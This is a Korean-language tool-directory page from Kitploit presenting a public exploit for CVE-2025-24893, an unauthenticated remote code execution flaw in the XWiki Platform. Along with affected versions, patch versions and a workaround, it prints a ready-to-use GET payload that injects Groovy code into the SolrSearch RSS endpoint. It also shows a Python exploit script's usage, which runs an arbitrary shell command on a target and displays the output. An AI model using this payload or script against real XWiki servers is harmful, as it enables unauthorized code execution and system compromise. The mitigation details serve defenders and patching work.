Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-24893 | Kitploit
도구/GitHubGitHub/b0ysie7e/cve-2025-24893
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubb0ysie7e/cve-2025-24893

CVE-2025-24893

저장소 보기
11311개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-24893용 익스플로잇

CVE-2025-24893는 XWiki Platform에 영향을 미치는 치명적인 인증되지 않은 원격 코드 실행(RCE) 취약점입니다.
이 결함으로 인해 모든 게스트 사용자는 인증 없이 특수하게 조작된 RSS 요청을 SolrSearch 엔드포인트로 보내 임의의 Groovy 코드를 주입하고 실행할 수 있습니다.

이는 영향을 받는 시스템의 기밀성, 무결성 및 가용성에 직접적인 영향을 미칩니다.

요약

  • 영향받는 버전:
    • XWiki ≥ 5.3-milestone-2 up to < 15.10.11
    • XWiki ≥ 16.0.0-rc-1 up to < 16.4.1
  • CVSS v3.1 점수: 9.8 (치명적)
    벡터: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 악용 가능성: 매우 쉬움 — 단일 HTTP GET 요청으로 충분합니다.

⚠️ 면책 조항:

이 코드는 교육 및 연구 목적으로만 사용됩니다. 명시적 허가 없이 시스템에 무단 사용하는 것은 법률 위반이 될 수 있습니다. 저자는 이 도구와 관련된 오용 또는 악의적인 활동에 대해 책임을 지지 않습니다.

개념 증명 (POC)

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}

익스플로잇 스크립트 사용 설명서

이 섹션에서는 CVE-2025-24893을 악용하기 위해 Python 익스플로잇 스크립트를 설정하고 실행하는 방법을 설명합니다.


root@kitploit:~
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
root@kitploit:~
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d

[+] Command output 'uname -a':

Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
                                  

완화 조치

패치 버전으로 업데이트:

취약점을 패치하려면 XWiki를 다음 버전 중 하나로 업데이트하세요:

  • XWiki 15.10.11
  • XWiki 16.4.1
  • XWiki 16.5.0 RC1

임시 해결 방법:

업데이트가 즉시 불가능한 경우 임시 해결 방법을 적용할 수 있습니다:

  1. SolrSearchMacros.xml 파일(위치: Main.SolrSearchMacros)의 955행 근처를 편집합니다.
  2. 출력 로직을 콘텐츠 유형이 application/xml로 설정된 rawResponse 매크로를 사용하도록 교체합니다.
    macros.vm의 2824행에 있는 구현을 참조로 사용하세요.

참고 자료:

  • NVD - CVE-2025-24893
  • Ionix Blog
  • Miggo.io
도구 다운로드